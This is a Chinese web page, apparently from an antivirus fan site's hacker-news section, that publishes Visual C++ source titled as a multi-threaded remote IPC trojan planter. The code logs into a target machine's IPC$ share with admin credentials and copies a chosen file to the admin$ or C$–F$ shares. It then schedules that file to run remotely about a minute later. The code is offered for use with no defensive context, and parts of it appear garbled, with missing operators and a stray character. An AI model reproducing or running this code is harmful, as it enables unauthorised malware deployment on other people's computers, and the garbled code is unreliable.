网站首页 | IT博客 | 江西SEO

免费杀毒软件,全面病毒解决方案

投递文章  投稿指南 金山毒霸非官方通告:
搜索: 您的位置毒霸首页>毒霸资讯>黑客动态>阅读资讯:VC 多线远程IPC种植木马

VC 多线远程IPC种植木马

1970-01-01 00:00:00   来源:   作者:   【 评论:0
要实现代码如下///////////////////////////////////////////////////////////////////////////////////// typedef struct TagHost { CString host; CString user; CString pass; CString filename; CString LocalFilePath; CListBox* list; }IPC; void CShareDlg::OnStart() 启动线程序 {   UpdateData(TRUE);   IPC* ipc = new IPC;   ipc->host = m_host;   ipc->user = m_user;   ipc->pass = m_pass;   ipc->LocalFilePath = m_localfile;   ipc->filename = filename;   ipc->list = &m_list;   AfxBeginThread(ThreadIpcConnect,ipc); } 线程///////////////////////////////////////////////////////////////////////////////////////////////// UINT ThreadIpcConnect(LPVOID lpvoid) {   IPC* ipc;   CListBox* list;   ipc = (IPC*)lpvoid;   CString host;   CString admin;   CString pass;   CString filename;   CString localfilepath;   host = ipc->host ;   pass = ipc->pass;   admin = ipc->user;   localfilepath = ipc->LocalFilePath;   filename =ipc->filename ; list = ipc->list;   BOOL IpcConnect;   LPTIME_OF_DAY_INFO TimeBuf=NULL;   NET_API_STATUS Status;   CString RemoteFilePath,CmdCom(\"admin$\\\"); ///////////////////////////////IPC连接////////////////////////////////////////////////////////////////   NETRESOURCE ns;   TCHAR buf[MAX_PATH];   wsprintf(buf,\"\\\\%s\\ipc$\",host);   ZeroMemory(&ns,sizeof(ns));   ns.dwScope=RESOURCE_GLOBALNET;   ns.dwType=RESOURCETYPE_ANY;   ns.dwDisplayType=RESOURCEDISPLAYTYPE_GENERIC;   ns.dwUsage=RESOURCEUSAGE_CONNECTABLE;   ns.lpLocalName=\"\";   ns.lpRemoteName=buf;   ns.lpProvider=NULL;   ns.lpComment=NULL;   CString hhost = host;   IpcConnect =WNetAddConnection2(&ns,pass,admin,0); ///建立IPC连接   if(IpcConnect)   { //连接成功后 ///////////////////////////连接成功上传文件//////////////////////////////////////////////////////////     RemoteFilePath=(\"\\\\\" host \"\\admin$\\\" filename);     IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE); //复制文件到admin$(winnt) 如果复制失败,,向其他共享区复制       if(!IpcConnect)         {           RemoteFilePath=(\"\\\\\" host \"\\C$\\\" filename);           CmdCom=\"C:\\\" filename;           IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);             if(!IpcConnect)             {                RemoteFilePath=(\"\\\\\" host \"\\D$\\\" filename);                CmdCom=\"D:\\\" filename;                IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);            if(!IpcConnect)                   {                      RemoteFilePath=(\"\\\\\" host \"\\E$\\\" filename);                      CmdCom=\"E:\\\" filename;                      IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);                      if(!IpcConnect)                        {                         RemoteFilePath (\"\\\\\" host \"\\F$\\\" filename);                         CmdCom = \"F:\\\" filename;                      IpcConnect = CopyFile(localfilepath,RemoteFilePath,FALSE);                        }                   }               }          } ///////////////////////////得到远程主机时间///////////////////////////////////////////////////////////          if(IpcConnect)          {//获取远程主机时间            Status=NetRemoteTOD(host.AllocSysString(),(LPBYTE *)&TimeBuf);             if(Status==NERR_Success)             {//活取时间成功 ///////////////////////////启动目标文件///////////////////////////////////////////////////////////////               DWORD day=1,JobTime;               AT_INFO ai;               day=day*2;               ai.Command=CmdCom.AllocSysString();               ai.DaysOfMonth=day;               ai.DaysOfWeek=0;               ai.Flags=JOB_NONINTERACTIVE;               ai.JobTime=((TimeBuf->tod_hours (-TimeBuf->tod_timezone)/60)$)*60*60*1000 (TimeBuf->tod_mins 1)*60*1000;               Status=NetScheduleJobAdd(hhost.AllocSysString(),(LPBYTE)&ai,&JobTime);               //启动上传的文件,一分钟后启动               if(Status==NERR_Success)               {                 list->AddString(host \"启动成功\");               }               else                 list->AddString(host \"启动失败\");               }           else             {              list->AddString(host \"获取时间失败\");             }          }          else          {           list->AddString(host \"复制文件失败\");          }     }     else     list->AddString(host \"连接失败\"); return TRUE; }


  返回首页
Tags:  
责任编辑:
  • 上一篇:记用BAT(批处理脚本)实现文件下载功能
  • 下一篇:注入下载文件的代码到IE进程然后执行下载的文件
    • 相关文章列表
    请文明参与讨论,禁止漫骂攻击。 用户名:新注册) 密码: 匿名:
    评论总数:0 [ 查看全部 ] 网友评论
    推荐文章
    热门文章
    关于我们 - 联系我们 - 广告服务 - 法律声明 - RSS订阅 - 网站地图 - 返回顶部 -

    Copyright ? 2008 - 2009 jinshanduba2008 Organization, All Rights Reserved


    金山毒霸后援团 www.xduba.cn 版权所有,未经授权禁止转载、摘编、复制或建立镜像.如有违反,追究法律责任.


    赣ICP备07001615号